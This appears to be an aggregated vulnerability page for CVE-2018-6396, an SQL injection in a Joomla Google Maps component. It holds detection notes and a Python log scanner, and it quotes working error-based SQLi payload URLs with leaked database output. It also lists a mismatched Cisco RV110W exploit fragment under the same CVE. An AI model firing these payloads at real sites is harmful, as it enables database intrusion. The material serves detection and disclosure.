CVE-2018-6396
Published: 2018-02-17
Priority: P271 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 23.97% (97.6th percentile)
SQL Injection exists in the Google Map Landkarten through 4.2.3 component for Joomla! via the cid or id parameter in a layout=form_markers action, or the map parameter in a layout=default action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| google_map_landkarten_project | google_map_landkarten | <= 4.2.3 | — |
Detection & IOCs (extracted from sources)
URL: index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1' AND (SELECT 6142 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e,(SELECT (ELT(6142=6142,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ptYA&id=1&format=raw
URL: index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=1+AND+EXTRACTVALUE(4855,CONCAT(0x5c,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),(SELECT+(ELT(4855=4855,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))&format=raw
- Detect SQLi attempts against the com_gmap Joomla component by monitoring requests containing 'option=com_gmap' combined with 'layout=form_markers' and SQL payloads in the 'cid' or 'id' parameters (e.g. single-quote, AND, SELECT, EXTRACTVALUE, CONCAT keywords).
- Also monitor requests with 'option=com_gmap' and 'layout=default' for SQL injection payloads in the 'map' parameter.
- Error-based SQLi technique observed: FLOOR(RAND(0)*2) with GROUP BY on INFORMATION_SCHEMA.PLUGINS triggers a '1062 Duplicate entry' MySQL error. Monitor web server/application logs for this error string as evidence of successful exploitation.
- XPATH error-based SQLi technique observed: EXTRACTVALUE() with CONCAT(0x5c,...) triggers a '1105 XPATH syntax error'. Monitor application/DB logs for this error string as evidence of active exploitation.
- The exploit uses 'view=gm_markers&tmpl=component&format=raw' in the request. This combination is specific to the vulnerable code path and can be used as a high-fidelity filter in WAF or SIEM rules.
- The exploit URLs use 'localhost' as the target host; in real-world detections, replace with the actual target hostname/IP. The SQL payloads and parameter names (cid, id, map) are the stable, host-independent indicators.
- Vulnerability affects Google Map Landkarten versions up to and including 4.2.3 for Joomla!. Installations running version 4.2.3 or earlier should be treated as unpatched.
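The request-side and error-string checks from the notes above, written out as an added Python example (it is not taken from the advisory or the exploit sources). The function names, the combined-log-format assumption and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names as injectable, keyed by the layout value.
WATCHED = {"form_markers": ("cid", "id"), "default": ("map",)}
# SQL markers listed in the detection notes: quote, AND, SELECT, EXTRACTVALUE, CONCAT.
SQL_MARKERS = re.compile(r"'|\b(?:and|select|extractvalue|concat)\b", re.I)
# MySQL/MariaDB error strings the notes tie to the two error-based techniques.
DB_ERRORS = ("1062 Duplicate entry", "1105 XPATH syntax error")
# Assumption: access log in combined format, request line in double quotes.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return sorted names of watched parameters whose decoded value has SQL markers."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)  # decodes %xx and '+'
    if "com_gmap" not in query.get("option", []):
        return []
    hits = set()
    for layout in query.get("layout", []):
        for name in WATCHED.get(layout, ()):
            if any(SQL_MARKERS.search(v) for v in query.get(name, [])):
                hits.add(name)
    return sorted(hits)

def scan_access_log(lines):
    """Yield (line_number, params) for each access-log line that matches."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        params = suspicious_params(match.group(1)) if match else []
        if params:
            yield number, params

def has_db_error(line):
    """True if an application/DB log line contains one of the error strings."""
    return any(marker in line for marker in DB_ERRORS)

# Constructed sample lines (not real traffic); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Feb/2018:10:00:01 +0000] "GET /index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=12&id=3&format=raw HTTP/1.1" 200 512',
    '203.0.113.9 - - [17/Feb/2018:10:00:07 +0000] "GET /index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1%27%20AND%20(SELECT%201)--%20x&id=1&format=raw HTTP/1.1" 500 310',
    '203.0.113.9 - - [17/Feb/2018:10:00:09 +0000] "GET /index.php?option=com_gmap&layout=form_markers&cid=1&id=1+AND+EXTRACTVALUE(1,1) HTTP/1.1" 500 298',
    '203.0.113.9 - - [17/Feb/2018:10:00:12 +0000] "GET /index.php?option=com_gmap&layout=default&map=2%27 HTTP/1.1" 500 120',
    '203.0.113.7 - - [17/Feb/2018:10:00:15 +0000] "GET /index.php?option=com_content&id=1%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, params in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: SQL markers in {params}")
```

Matching on the decoded value catches both the `%27`/`%20` and the `+` encodings seen in the two URLs above; pair request hits with `has_db_error` over application logs to separate probing from requests that reached the database.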
CVSS provenance
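| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |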
No detection rules found.
Exploit-DB
Cisco RV110W - Password Disclosure / Command Execution
exploitdb·2018-12-14·CVSS 10.0
CVE-2015-6396 [CRITICAL] Cisco RV110W - Password Disclosure / Command Execution
---
#!/usr/bin/env python2
#####
## Cisco RV110W Password Disclosure and OS Command Execute.
### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)
# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
# Date: 2018-08
# Exploit Author: RySh
# Vendor Homepage: https://www.cisco.com/
# Version: 1.1.0.9
# Tested on: RV110W 1.1.0.9
# CVE : CVE-2014-0683, CVE-2015-6396
import os
import sys
import re
import urllib
import urllib2
import getopt
import json
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
###
# Usage: ./{script_name} 192.168.1.1 443 "reboot"
###
if __name__ == "__main__":
    # Positional arguments: target IP, port, command (see Usage above).
    IP = sys.argv[1]
    PORT = sys.argv[2]
    CMD = sys.argv[3]
    # Get session key, Just access index page.
u
Exploit-DB
Joomla! Component Google Map Landkarten 4.2.3 - SQL Injection
exploitdb·2018-02-16·CVSS 9.8
CVE-2018-6396 [CRITICAL] Joomla! Component Google Map Landkarten 4.2.3 - SQL Injection
---
# # # #
# Exploit Title: Joomla! Component Google Map Landkarten cmslitedoct'
http://localhost/Joomla375/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1' AND (SELECT 6142 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e,(SELECT (ELT(6142=6142,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ptYA&id=1&format=raw
1062 Duplicate entry 'IHSAN SENCAN1root@localhost : joomla375 : 10.1.21-MariaDB1' for key 'group_key'
http://localhost/Joomla375/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=1+AND+EXTRACTVALUE(4855,CONCAT(0x5c,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)
No writeups or analysis indexed.
2018-02-17
Published